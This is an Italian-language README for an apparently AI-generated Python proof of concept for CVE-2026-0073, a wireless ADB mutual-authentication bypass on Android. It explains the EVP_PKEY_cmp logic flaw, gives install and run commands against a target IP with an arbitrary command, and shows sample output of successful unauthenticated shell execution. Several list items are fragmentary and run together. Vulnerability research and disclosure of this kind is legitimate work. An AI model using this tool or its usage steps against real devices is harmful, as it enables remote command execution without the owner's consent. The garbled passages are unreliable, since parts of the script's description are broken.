
CVE-2026-0073 - PoC per il Bypass dell'Autenticazione Reciproca Wireless ADB
Questa directory contiene una proof of concept in Python per CVE-2026-0073.
Lo script è generato utilizzando tecniche di generazione del codice assistite da intelligenza artificiale.
CVE-2026-0073 è un problema logico nella verifica dei certificati del daemon ADB (adbd_tls_verify_cert in auth.cpp).
Il controllo vulnerabile tratta qualsiasi valore diverso da zero restituito da EVP_PKEY_cmp(...) come una corrispondenza riuscita.
La gestione prevista del risultato del confronto dovrebbe essere:
1 = le chiavi corrispondono0 = le chiavi non corrispondonoNelle build vulnerabili, i valori negativi vengono trattati come veri e possono contrassegnare erroneamente un certificato come autorizzato.
poc-cve-2026-0073.pyLo script:
ec o ed25519).shell: con fallback exec:).cryptographyInstalla la dipendenza:
pip install cryptography
Scopri il servizio ADB di destinazione (se necessario):
adb mdns services
Esegui il PoC:
python3 poc-cve-2026-0073.py <target_ip> [port] [command] [key_type] [--verbose]
Argomenti:
target_ip: Indirizzo IP del dispositivo Android di destinazioneport: Porta ADB (predefinita: 5555)command: Comando da eseguire (predefinito: id)key_type: ec o ed25519 (predefinito: ec)--verbose: Abilita i log di debug del protocolloEsempi:
python3 poc-cve-2026-0073.py 192.168.1.100 5555 id
python3 poc-cve-2026-0073.py 192.168.1.100 5555 whoami ec --verbose
python3 poc-cve-2026-0073.py 192.168.1.100 5555 getprop ed25519
[*] Opening service: 'shell:id'
[*] After OPEN, received: OKAY arg0=2 data=b''
[+] Stream open (local_id=1, remote_id=2)
[+] Command output:
----------------------------------------
uid=2000(shell) gid=2000(shell) ...
----------------------------------------
[+] Exploitation successful.
Connection refused
certificate_unknown
Timeout in attesa di risposte
--verbose per tracce a livello di pacchetto.Il livello di patch di sicurezza di base del sistema operativo e la patch dei moduli Mainline possono differire. Un dispositivo può mostrare un SPL mensile più vecchio mentre riceve correzioni più recenti del modulo ADB.
Controlli utili:
adb shell getprop ro.build.version.security_patch
adb shell pm list packages --apex-only | grep adbd
adb shell dumpsys package com.google.android.adbd | grep -E "versionCode|versionName|lastUpdateTime"
Utilizza questo PoC solo in ambienti autorizzati (dispositivi di laboratorio di tua proprietà, permesso esplicito o test sanzionati). Non eseguirlo contro sistemi che non possiedi o per i quali non hai autorizzazione scritta per il test.
daemon/auth.cpp)